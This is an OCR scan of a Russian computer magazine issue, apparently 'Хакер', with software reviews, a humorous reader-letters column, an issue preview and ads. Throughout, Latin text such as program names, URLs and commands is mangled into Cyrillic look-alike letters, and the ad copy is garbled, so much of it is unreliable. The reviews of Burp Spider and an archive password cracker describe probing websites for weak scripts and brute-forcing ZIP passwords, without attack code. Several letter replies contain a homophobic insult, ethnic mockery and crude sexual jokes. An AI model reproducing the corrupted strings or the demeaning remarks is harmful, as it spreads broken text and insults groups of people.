теке (ЗТК+2 клиент для 
работы с І_іѵе^игпаІ. 
Понравится тем, кто 
предпочитает обыч- 
ные клиенты веб-ин- 
терфейсам. І_одиат хо- 
рошо русифицирован, 
состоит из редактора 
сообщений и некото- 
рых вспомогательных 
функций — например, 
ХНТМЬразметки (как 
известно, Ыѵе^итаІ 
использует не НТМІ_, а 
именно ХНТМІ_). Если 
ты хочешь вставить в 
сообщение картинку, 
то І_од^т сам определит ее размер и заполнит все параметры элемен- 
та ІМО (правда, для этого программе придется скачать картинку из Се- 
ти). І_од^т умеет также брать у ХММ5 и Веер Месііа РІауег (ВМР) назва- 
ние текущей воспроизводимой песни и помещать его в соответствующее 
поле сообщение. 

Удобно реализована возможность открывать сообщения с сервера, ре- 
дактировать и сохранять их обратно в І_іѵеиоигпаІ. 

Вдобавок к элементам ХНТМІ_ есть быстрый доступ к вставке специфич- 
ных для иѵеііоигпаі тэгов: у-сиі, У-изег. Также можно помещать в сообще- 
ние текст, выданный в консоль внешней программой. Кстати, чтобы по- 
лучить название песни из плеера Атагок, можно дать команду: бсор 
атагок рІауег поѵѵРІауіпд. Сам по себе І_од^т, увы, не умеет получать 
информацию от Атагок. 

В целом, І_од^т — идеальный ЖЖ-клиент для диалапщиков, которые 
дорожат трафиком. Написал сообщение, подключился к Сети, нажал 
кнопку «Отправить» , отключился. 






мчи 



ьціри 
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ТЕА 10.2 

Р05ІХ (*ВЗР, Ыпих, Зоіагіз...) 

Размер (в .Ьг2): 382 КБ 

Иир:/Леа.Ііпих.кіеѵ.иа 

Лицензия: ѲІЧІ) СРІ_ 



Текстовый редактор и процессор в одном лице. Зависит только от биб- 
лиотеки ОТК+2.4 (или выше) и выборочно — от АЗреІІ (для проверки ор- 
фографии). ТЕА оснащен множеством функций обработки текста — нап- 
ример, может фильтровать его по заданному шаблону, сортировать, при- 
менять шаблон к каждой строке. Допустим, ты хочешь заключить в тэги 
<Ііх/Іі> каждую строку в выделенном фрагменте текста. Шаблон для это- 
го будет очень прост: <1і>%з</1і>. 

В ТЕА встроены средства и утилиты для подготовки документов в фор- 
мате ХНТМЦ НТМЦ 
ОосЬоок и І_аТеХ. Все- 
возможные мастера, 
конверторы текста с 
правильной разбивкой 
на параграфы и так 
далее. 

ТЕА оснащен встроен- 
ным файловым ме- 
неджером под назва- 
нием Квас, основан- 
ным на миниатюрах 
браузером картинок 
Ітадеріапе, и смот- 
релкой изображений 
(взаимодействует как 
в Ітадеріапе, так и с 
самим ТЕА — можно 
открыть картинку, чье 
имя указано в тексте в 
месте курсора). Кроме 




того, ТЕА может открывать в режиме «только чтение» документы 
ОрепБоситепІ, ОрепОШісе.огд ѴѴгіІе, КѴѴогб, АЬіѵѵогсІ и РЛТ (наличие 
офисных пакетов при этом не нужно). 

Из других интересных особенностей ТЕА можно выделить следующие. 
Просмотр картинок прямо в тексте [Х]НТМІ_-документа. Редактирование 
субтитров в формате 5 ВТ (требуется М рІауег для просмотра результа- 
тов). Простейшая ЮЕ. Выдача статистики текста. Универсальный тексто- 
вый анализатор (сокращенно — УНИТАЗ). Поддержка сессий, шаблонов, 
закладок, переопределение горячих клавиш и много чего еще. На сайте 
редактора доступен также форк ТЕА — СИаі. СИаі основан на движке 
ОікЗоигсеѴіеѵѵ, требует больше библиотек, однако предоставляет поль- 
зователю динамическую подсветку синтаксиса (в ТЕА работает только 
статичная) и некоторые другие вещи, интересные программистам. К 
программе прилагается большая документация на русском языке. 

ЗуІрІіеесІ-СІаѵѵз 1.9.3 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...), ѴѴіп32 

ІШр://сІаѵѵз.зуІрНеесІ.огд 

Размер (в .д т)\ 3.4 Мб. 

Лицензия: ОШ ОРІ_ 



ЗуІрИееб-СІаѵѵз — это 
более эксперимен- 
тальный вариант поч- 
тового клиента под 
названием ЗуІрПеесІ. 
ЗуІрПеесІ-СІаѵѵз, по 
возможностям можно 
сравнить с КМаіІ или 
ТНеВаІІ. ЗуІрНееб-СІаѵѵз 
работает на многих 
платформах — выпус- 
каются версии этого 
почтовика как для 
*І\ІІХ, так и ѴѴіпбоѵѵз. В старой, основанной на первом ОТК ветке 
ЗуІрПеесІ-СІаѵѵз были проблемы с русскими кодировками, однако в теку- 
щей ветке под ОТК+ 2 эти проблемы полностью решены. 

ЗуІрПеесІ-СІаѵѵз — «чистый» почтовик, без разных планировщиков и ка- 
лендарей. Есть, впрочем, адресная книга, причем не самая удобная. Од- 
нако плюсов у ЗуІрИеесІ-СІаѵѵз намного больше, чем минусов. Программа 
запускается почти мгновенно — раз. Позволяет настроить все и вся — 
два. Обладает мощным движком фильтров — три. 

Письма ЗуІрИеесІ-СІаѵѵз хранит в формате МН. Это когда каждое 
письмо в отдельном файле. Интерфейс у ЗуІрПеесІ-СІаѵѵз вполне 
стандартный для почтового клиента, включая популярную нынче 
строку быстрого поиска. Чего нет, так это виртуальных папок, куда 
складывались бы результаты поиска. 

В качестве новостного клиента (для І\ІЫТР) я ЗуІрНеесІ-СІаѵѵз не ис- 
пользую , так как реализация, относящаяся к этой функции, стабиль- 
ностью не отличается. Но для почты... Я весной перешел с КМаіІ на 
ЗуІрНеесІ-СІаѵѵз (работал в КЭЕ), и пока не задумываюсь об обратном 
переходе. 

СККеІІМ 2.2.7 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...), ѴѴіп32 

ѵѵѵѵѵѵ.дкгеііт.пеі 

Размер (в .Ьг): 658 кб 

Лицензия: ОШ (ЗРІ_ 





Одни используют для мониторинга ЗирегкагатЬа 
или Резкіеіз, другие же (вроде меня) доволь- 
ствуются более скромной в потреблении ре- 
сурсов утилиткой ОКВеІІМ (ОШ КгеІІ Мопііогз). 
Она представляет собой вертикальную па- 
нель, в которую встраиваются «креллы» — 
блоки вывода различной информации: темпе- 
ратур, загрузки процессора, памяти, файловой 
системы, сети и так далее. 

ОКВеІІМ поддерживает сотни скинов и десятки 
плагинов. Но и встроенных креллов тоже доста- 
точно. Некоторые из них требуют дополнитель- 
ных внешних программ — например, для изме- 
рения температур понадобится Іт_зепзогз, ко- 
торый, впрочем, найдется в каждом дистрибу- 
тиве Ыпих. Сама же ОКВеІІМ зависит от библи- 
отек ОТК-і-2 и сопутствующих ей ОІ_іЬ и ОРК. А значит, не имеет жесткой 
привязки к какой-либо среде рабочего стола или оконному менеджеру. 
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АРІСК 2.3.0 

Кросс-платформенная 

ѲШ 0РІ_ 

Зіге: 516 Кб 

аііск.зоигсеіогде.пеі 



Если тебе хотя бы раз приходилось отвечать за безопасность ІІМХ-сер- 
вера, то ты наверняка знаком с отличной программой аісіе ( зоигсе - 
іогде.пеі/рго]есіз/аісіё). Утилита, написанная на чистом С, проста как две 
копейки: она последовательно обходит заданные админом папки и ката- 
логи, сохраняя в базу данных права доступа, размер, время создания, 

владельца каждого входящего в 
них файла. Таким образом, адми- 
нистратор в любой момент может 
отслеживать изменение в систем- 
ных файлах и проверять их цело- 
стность, выявляя произведенные 
руткитами и троянами изменения. 
Для большей уверенности, для 
каждого файла по одному из под- 
держиваемых алгоритмов вычис- 
ляется хэш. И если подделать все 
прочие параметры вполне реаль- 
но, то изменить файл так, чтобы 
его хэш остался неизменным, 



практически невозможно. И все бы было хорошо, но аісіе заточена под 
ІІМХ, а ѴѴіпсІоѵѵз-админы остаются не у дел. Но не беда: им наверняка 
по душе придется аналог аісіе — АРІСК. Эта утилита написана на РегГе, 
не зависит от АРІ конкретных операционных систем, и поэтому являет- 
ся полностью кросс-платформенной. Ты можешь использовать как под 
ІІпіх, используя консольную или ОШ-шную оболочки, либо под ѴѴіпсІоѵѵз 
вкупе с Асііѵе РегІ {ѵѵѵѵѵѵ.асііѵезіаіе.сот). Принцип ее действия пол- 
ностью аналогичен аісіе: сначала создается БД с параметрами и хэша- 
ми файлов: 

РегІ аТіск.рІ -с ѵѵіпсіоѵѵз.сопТ -і -ѵ 
А затем при необходимости осуществляется проверка: 

РегІ аТіск.рІ -с ѵѵіпсіоѵѵз.сопТ -к 
Апдейт базы осуществляется командой: 

РегІ аТіск.рІ -с ѵѵіпсіоѵѵз.сопТ -и 

Вигр зрісіег ѵі.2 

Кросс-платформенная 

ЗНагеѵѵаге 

Зіге: 460 Кб 

рогізѵѵіддег.пеі/зрісіег/ 



Найти уязвимый ѵѵеЬ-сценарий существенно легче, чем уязвимый сер- 
вис — это теорема, доказанная практикой. Для серверного софта пос- 
тоянно выходят обновленные версии, его исходники могут удачно ис- 
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следовать только профи и, что самое главное, любой горе-админ зна- 
ет, что серверный софт нужно постоянно апдейтить. Другое дело — 
ѵѵеЬ-скрипты. Еще вчера читавший книгу «РНР для чайников» админ 
начинает варганить свои собственный скрипты для автоматизации. А 
что в итоге? Куча потенциальных уязвимостей, о которых, скорее все- 
го, никто и никогда не узнает. Если, конечно, не брать в расчет потен- 
циального хакера. Искать скрипты на сервере, а затем и их слабые 
места — занятие довольно нудное и кропотливое. В значительной ме- 
ре облегчить этот труд способны специальные утилиты, одной из кото- 
рых является Вигр зрібег. С ее помощью хакер без труда сможет оце- 
нить устройство сайта: его структуру, используемые сценарии, пара- 
метры, которые им передаются. Вся добытая информация отображает- 
ся в виде наглядного дерева, которая дополняется специальной табли- 
цей с самыми подробными данными. Вещь действительно стоящая, су- 
ди сам. Запускаешь Вигр зрібег, прописываешь прокси, далее указыва- 
ешь сайт, на котором нужно найти уязвимости и смело жмешь «Вип». 
Уже через несколько минут ты сможешь визуально оценить, какие сце- 
нарии могут быть уязвимы, и где можно «покопаться». Причем копать- 
ся вручную, как в огороде с лопатой в руках, не придется: Вигр зрібег 
предоставляет отличную возможность в удобной форме эксперименти- 
ровать со значениями, передаваемых ѵѵеЬ-скриптам. Тебе нужно лишь 
ввести их значения в удобном окошке, и программа сама сгенерит нуж- 
ный ІІВІ_, пошлет запрос и выдаст подробную информацию об ответе 
сервера на экран. Кстати говоря, все отчеты программы логируются и 
к ним легко можно вернуться позднее. Единственный нюанс: прога на- 
писана на баѵа, поэтому для ее работы понадобится баѵа Випііте 
Епѵігоптепі (/а ѵа.зип. сот/}2зе/сіо ѵѵпіоа с/з . МтІ) 

АсІѵапсесІ АгсИіѵе 
Раззѵѵогсі Весоѵегу 

ѴѴіпбоѵѵз 

ЗІіагеѵѵаге 

Зіге: 908 Кб 

ѵѵѵѵѵѵ.раззѵѵогбз.ги/агсНрг.НІтІ 



Странная тенденция. В какую бы контору я не устраивался работать, обяза- 
тельно найдется человек, который спросит: «Как можно взломать 2ІР-ар- 
хив?» :). На самом деле сделать это под силу каждому, особенно если под 
рукой есть специальный прога Абѵапсеб АгсИіѵе Раззѵѵогб Весоѵегу. Как и в 
любой другой аналогичной утилите, перебор осуществляется по словарю 
или автоматически генерируемым паролям. Пользователь имеет право сам 
определить критерии поиска, обозначить параметры пароля (перечень сим- 
волов, максимальная и минимальная длина и т.п.), а также обозначить мас- 
ку (например, п????ь). Последнее может особенно пригодиться, если часть 
символов и их расположения заведомо известны. Благодаря оптимизации 
под современные процессоры, Абѵапсеб АгсИіѵе Раззѵѵогб Весоѵегу может 
похвастаться довольно высокой скоростью перебора. Правда, в случае с 
АСЕ и ВАВ ее возможности сильно урезаются из-за специфики шифрова- 
ния данными архиваторами, но зато с 2ІР'ом и АВб все просто замечатель- 
но. Примечательно, что для такого типа архивов возможна атака по изве- 
стному содержанию (кпоѵѵп ріаіпіехі аНаск), которая еще больше увеличи- 
вает шансы быстро найти желанный пароль. Разработчики утверждают, 
что если известно содержания хотя бы одного файла из архива, то все ос- 
тальные файлы могут быть извлечены всего за несколько часов. При этом 
Абѵапсеб АгсИіѵе Раззѵѵогб Весоѵегу не найдет пароль как таковой, зато 
подберет три 32-битных ключа, с помощью которых и расшифрует содер- 
жимое архива. Конкретно по 2ІР-архивам скажу — взломать их проще па- 




реной репы. 7\Р использует предельно примитивное шифрования, поэтому 
поиск пароля может осуществляться со скоростью 15 миллионов паролей в 
секунду на процессоре Р-ІІІ 1 ГГц. Впечатляет, правда? 

КпосксІ 

ѴѴіпбоѵѵз/ипих 

Орепзоигсе 

Зіге: 83 Кб (Сервер), 513 Кб (клиент под ѴѴіпбоѵѵз) 
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Разговор с админом-коллегой (случай из жизни): 

— Степ, подключись через 35Н на 10.1.1.10, пожалуйста. 

— Не пашет, говорит, что порт закрыт... 

— Не может быть! 

— Чего не может? Там вообще ВСЕ порты закрыты: я только что 
птар'ом проверил... 

Не долго думая, админ подходит ко мне, запускает через какой-то ВАТ-файл 
ЗЗН-клиент РиНу и совершенно спокойно подключается к серверу. . . После 
этого он открывает браузер и с тем же успехом коннектится еще и к установ- 
ленному на той же машине веб-серверу. Что за фигня?! Оказалось, что с не- 
давних порт админ «подсел» на использовании довольно мощной и веселой 
технологии Роб Кпоскіпд (если переводить, то получается что-то вроде «пос- 
тучать в порт»). Фишка заключается в том, что на сервере устанавливается 
специальная софтина, которая «слушает сеть» и управляет правилами файр- 
вола. Если на заданный порт приходит специально составленный пакет (тук- 
тук!), являющийся индикатором к действию, то программа открывает порты, 
которые заданы в конфигурации (например, ЗЗН и веб-сервер), и разрешает 
к ним подключение. Но это самый простой случай. Благодаря тому, что уп- 
равление портами осуществляется с помощью банального файрвола 
(Кпоскб работает с ірІаЫез) можно обозначить совершенно изощренные пра- 
вила обработки индикационных пакетов. Вообще, существует довольно мно- 
го реализаций (тѵѵѵроіікпоскіпд.огд/ѵіеѵѵ/ітріетепіаііопз) этого механизма, 
однако я рекомендую использовать именно Кпоскб. Почему? Потому, что 
имеет клиентов под любую операционную систему, и ты без труда сможешь 
заюзать его, работая как под РОЗІХ, так и ѴѴіпбоѵѵз. 








Хочешь фирменный лого на свой сотовый? 
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ЗДРАВСТВУЙТЕ, ДОРОГИЕ МОИ ТЕЛЕЗРИТЕЛИ (С)! КАК ВСЕГДА, ЧИТАЮ Я ПИСЬМА ЧИТАТЕЛЕЙ, ПЛАЧУ, ИНОГ- 
ДА — СМЕЮСЬ. КАК ВСЕГДА, ЛИДИРУЮЩИЕ ПОЗИЦИИ ЗАНИМАЮТ ТРУДЫ В ДУХЕ: «УБЕЙ ДИЗАЙНЕРОВ МАГИ- 
ЧЕСКИМ ЖЕЗЛОМ, Я ИХ НЕНАВИЖУ», «НАГРАДИ ДИЗАЙНЕРОВ ЗОЛОТОМ, ЖУРНАЛ СТАЛ ОЧЕНЬ КРУТ», «Я НЕ 
МОГУ ПОНЯТЬ, КУДА ЖЕ ДЕЛСЯ ДАНЯ ШЕПОВАЛОВ», «ПРИВЕТ, ХОЛОД, МНЕ ОЧЕНЬ НРАВИТСЯ ТВОЙ ЖУРНАЛ, 
ТАК ДЕРЖАТЬ, УРА!», «ЧТО ЗА РБР ТАКОЙ, ПОЧЕМУ ВОРДОМ НЕ ОТКРЫВАЕТСЯ»? СМЕЮСЬ И РАДУЮСЬ Я НАД 
РЕАЛЬНЫМИ ВОПРОСАМИ И КОНСТРУКТИВНЫМИ ПОЖЕЛАНИЯМИ. НА ВОПРОСЫ Я, ПРАВДА, НЕ ОТВЕЧАЮ, А 
ОТСЫЛАЮ РЕДАКТОРАМ, А НА КОНСТРУКТИВНУЮ КРИТИКУ СМОТРЮ СКВОЗЬ РОЗОВУЮ ПРИЗМУ, ПОТОМУ 
ЧТО Я ОЧЕНЬ ПОЗИТИВНЫЙ ЧЕЛОВЕК :) 



Ггот: Виталий Коркунов [ѵіІаІ97@пагосІ.ги] 

§иЬі: Неработающий йѴО :( 

Здравствуй уважаемая редакция, и отдельное здрасьте тому, кто чита- 
етмое письмо. А пишу я вот по какому поводу. Купил недавно сентябрьс- 
кий номер ][, сразу разочаровался, нечитаемые шрифты, кислотная об- 
ложка, черно-белые иллюстрации. Какая-то геймерская реклама. Но это 
вся фигня, приехав из универа, решил посмотреть содержимое ЭѴЭ, но 
и тут облом — диск не захотел зарускаться, долго шаманил над ним, но 
никакого толку, иногда выдавал ошибку чтения или ошибку вот такого 
рода: "Приложение Аиіогип.ехе не может быть приложением ѴѴіп32" (мо- 
жет немного ошибаюсь, но примерно такое). Уж и реаниматорами дис- 
ков пользовался и АІсоІіоІ 120%, но толку нет. Ходил к соседям, у них 
запустился, но с 3-го раза. Обегал друзей, но эффект тотже, косячит 
вся =( А мне так хотелось нового касперского погялдеть и ІЕ 7.0. 
Можете мне помочь с диском? 

Ве: Привет тебе, о достойный муж! Твоя гражданская позиция предель- 
но ясна. Значит, кислотная обложка — плохо, шрифты — плохо, а ЭѴЭ 
— еще хуже? Не хочет «зарускаться? Не могу понять этого слова, но су- 
дя по корню, оно имеет какое-то отношение к русичам и национальному 
вопросу. Наверное, слово это означает «принудительно сделать руси- 
чем»? Тогда все остальное я понять не могу. Хотя, например, желание 
посмотреть на Касперского (всем известна его роскошная борода, если 
он ее конечно не сбрил) вполне понятно, он тоже очень достойный чело- 
век. Русич. А кислотность обложек связана с тем, что арт-директор наш, 
Константин, (тоже, кстати, русич) пристрастился к лизанию токсичных 



жаб с Огненных Островов. Лизнет, бывало, ее пропитанную галлюцино- 
геном шкуру — и упадет без чувств. А дизайнеры тоже не спят - раз - и 
подхватят его и посадят за компьютер. Там он со временем очнется, 
возьмет в руку мышку и несколько суток подряд дизайнит самым кис- 
лотным образом. Нам только остается его кормить, поить и дышать за 
него большим резиновым мешком. 

Ггот: Глухов И. С. [1сГіи-сІіеоѵѵ@гедіотоп1апо.сот] 

Ты знаешь, догадываюсь, что ты сруливашь к тому жирному Армену на 
Мерседесе, кроме того открою тайну тебе, пупсик, что я встретил твоего 
красавца на днях около подъезда и он мне сказал, что записывался к ма- 
гу {СЕЫЗОВЕО}, чтобы привязать тебя к себе. Можешь сама проверить: 
дозвони по тлф {СЕЫЗОВЕЭ} его помощнику или на сайт сходи: хакер.ш 

Ве: Однако, тема национальной терпимости просто красной нитью прохо- 
дит сквозь некоторые письма этого номера. Наверное, сказываются осен- 
ние обострения у различного рода душевнобольных, и ярким их предста- 
вителем является таинственный Глухов И. С. Этот явно гомосексуально 
настроенный господин обвиняет нас в связях (возможно, интимных ) с не- 
ким Арменом. Вай, нихарашо, дарагой. Ниправда это, панимаешь? 

Ггот: плиз 

§иЬ|: дравствуйте!!! 

Помогите мне, я купил хостинг и домен 1 уровня, все вроде реально по 
началу, но... Мой сайт никто не посещает!!!! Я бы хотел узнать как мож- 
но раскрутить сайт!!!???????? 





Ве: Вопрос, конечно, интересный... человек реально напрягся, купил 
хостинг и даже домен, первого уровня, но туда никто не ходит? Очень 
странно... Содержит ли твой сайт информацию? Если она посвящена 
охране труда и технике безопасности в работе скрубберщика-насосчика 
или обточника колесных пар на московском метрополитене, возможно, 
это не всем интересно. Возможно, про твой сайт никто не знает и знать 
не хочет, поскольку в его нише все уже и так занято более раскручен- 
ными проектами. Возможно, у тебя вообще нет сайта, а ты просто купил 
домен и хостинг и гордишься этим. В общем, мне трудно подсказать те- 
бе Путь. Попробуй запустить доодіе.сот и тебе откроется Дао. 

Ггот: аІех0001@уапсІех.ги 
$иЬі: ***Выбор процессора 

Здравствуйте. У меня возникло две проблемы, помогите, плиз, в их решении... 
Щ Какой проц выбрать? По деньгам подходит Р-4 3.2 ГГ ц. Что выбрать 
из Зх вариантов — обыкновенный, 540й или 640й? Под 640й надо будет 
новую мать (сейчас у меня А51І5 Р4Р800 Оеіихе), да еще с АОР, т.к. ви- 
дюху 68000Т просто так не сменишь. Чем они отличаются, что лучше 
взять? Игры, обжим видео. 

\2\ Потерял пароль. При заходе на сайт провайдера для входа в статис- 
тику набираю логин — пароль подставляется и все фунциклирует, зна- 
чит этот гад (пароль) где-то сидит. 

Ве: Неважно, какой он будет, этот процессор. Самое главное в нашем 
деле — это эстетика. Поэтому на процессоре должна быть золотая на- 
сечка, черные розы по периферии и портрет Льва Толстого , напечатан- 



ный методом литографии на лицевой стороне. Как тебе, наверное, изве- 
стно. Хай-тек дизайн нынче не в моде, а вот ретро-стиль — буквально 
последний писк ;) А насчет пароля — дело серьезное. Возможно, ОН 
где-то есть. Возможно — они где-то есть, но мы их не видим. Возможно, 
правительство что-то скрывает от нас. I ѵѵапі Іо Ьеііеѵе. Доставать его 
ниоткуда не надо — пробьет час, и он сам тебя достанет. 

Ггот: Руслан [таіІ@дІоЬаІігап5.ги] 

Здравствуйте уважаемая Редакция !!!... .мня интересует следуе- 
ще... возможно где нибудь купить журналы "Хакер" и "Хакер Спец" за 
2004 год.. ..если можно заказать у вас в редакции.то напишите пожа- 
луйста как это можно сделать. =)) 

С уважением ваш читатель Руслан 8). 

Ве: Конечно же, нет! Все старые номера Хакера мы прячем глубоко 
в подвалы редакции, а людей, которые пытаются у себя хранить жур- 
нал больше трех месяцев, мы жестоко преследуем морально и физи- 
чески. А если не получается — проникаем к ним туда, где они безза- 
щитны. В их сны. Поэтому, друг мой, не пытайся найти старые номе- 
ра Хакера в Олимпийском или у барыг. И уж тем более — никогда не 
пиши к там на эту тему и не заглядывай на хакер. ги в раздел тада- 
гіпе. К темной стороне это ведет. 

Ггот: ОІед [дгаііп@пе1тап.ги] 

8иЬ|: Мае 0§ 

Здравствуйте, уважаемые! 

Уже некоторое время в Интернете обсуждается тема установки операци- 
онной системы Мае ОЗ X Тідег 10.4.1 на обычные РС (см. приложенный 
файл). Не могли бы Вы в журнале подробно объямнить все тонкости этой 
установки? А уж если Вы выложите образ загрузочного диска на 0\/0(ко- 
торый весит больше 2 гектаров), то я уверен, что очень многие читатели 
Вашего замечательного журнала сделают титульный лист «Хакера» сво- 
ей стартовой страничкой и добавят Ваш журнал в «Избранное» 

С уважением, Ваш читатель! 

Ве: Предлагаю тебе отписать на эту тему лично Бублику как редактору 
рубрики РС-20ІМЕ. Может быть, ему понравится твое предложение. 

Ггот: Ех [тагаІіізі5@таіІ.ги] 

§иЬ|: подписка 

Здравствуйте, тадагіпе. 

Я хотел бы подписаться на журнал Хакер! 

Как мне это сделать? 

Ве: Если честно, письма от слепоглухонемых капитанов дальнего 
плавания я люблю больше всего. Даже больше спама. Вот, бывает, 
продираешься среди всех этих «у8е_ли4ь свой пениС на 5 см. поѵѵ», 
или там «письмо от Акакия Фредериковича» — и тут такой перл. Мо- 
гучий ум этого человека не видит не редакционной, ни обычной под- 
писки ни в нашем журнале, ни на сайте. Что я могу тут посовето- 
вать? Могу выслать два комплекта текстов, изготовленных с по- 
мощью алфавита Брайля. Первый — это подробный мануал по под- 
писке (читается двумя руками) и коллекцию фирменного порно для 
слепых (читается одной рукой). 

Ггот: Александр Когуткевич [іоІзіу5@іиі.Ьу] 

§иЬ|: Помогите 

Добрые люди помогите!!! Я сижу каждый день в инете, но каждый день 
на меня идет атака от какого то (зверя) у меня пишет что атака отраже- 
на и его ІР адрес но он постоянно меняеться. как можно реально узнать 
его настоящий адрес, а то он мне уже изрядненько надоел. 

Спасибо! 

Ве: Настоящий адрес его — Советский Союз, а имя его неизвест- 
но, поскольку имя его — Легион. А тебе, товарищ, я посоветую из- 
бавляться от супер-софта (не будем показывать пальцем), который 
каждую минуту пишет что-то вроде: «Ваш компьютер атакован 
страшной атакой (Іоѵезап). Атака успешно, хотя и с очень больши- 
ми затруднениями отражена. Чтобы выразить респект автору су- 
пер-ЮЗ — скорее напиши письмо)». Поставь нормальный файрвол 
(про тесты и мы, и Спец писали очень часто, например, в Спеце — 
«Секьюрити-фокусы») и на забывай про заплатки. Если будешь об- 
ращать много внимания на всяких вирусных ламеров, женщин-юзе- 
ров и прочих компьютерных маргиналов с сотней червей и полусот- 
ней троянов на компе — очень быстро станешь нервным, зеленым, 
часто задающим вопросы, горбатым юзером :). Таково проклятие 
великого компьютерного духа © 
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ЧИТАЙ 
В ОКТЯБРЕ: 



все о бесполосных сетях 
Жі-Рі: обнаружение, атаки, защита 
Бе з опа снасть ВІиеіооНі 
Вопсм мобильных устройств 
Уязвимости е КПК 
Взлом 5 ІМ- карты 
Сниффинг мобильно и связи 
ВМ5-спам 

"Мобильные" инструменты 
Фрики нт 
Взлом Пентагона 





Москва: АБ-групп (095) 745-51 75; Акситек (095) 784-7224; Банкос (095) 1 28-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 1 76-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1 1 58 
Компьютерный салон ЗМ5 (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; ОЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490 
СКИД (095) 232-3324; Тринити Электронике (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; РІаке (095) 236-992; Рогсе Сотриіегз (095) 775-6655 
І5М (095) 718-4020; Меі]іп (095) 727-1222; N7 Сотриіег (095) 970-1930; Рі-$іуІе Тгасііпд (095) 514-1414; Ю Сотриіегз (095) 755-8202; ІЛ.ТКА Сотриіегз (095) 729-5255; ЭЛЕКТОН (095) 956-3819 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 




Поручите бумажную работу профессионалам. 




Где бы Вы ни работали. в малонышй Фирм или в стройной яррлорамии, Вы смажете подобрать принтер Батвиод отвдчлддіий 
потребностям Вашего офиса. Служба поддержки лольжша тепой Затпиіпд обеспечит бесперебойна работу Ваше* тохімм. 
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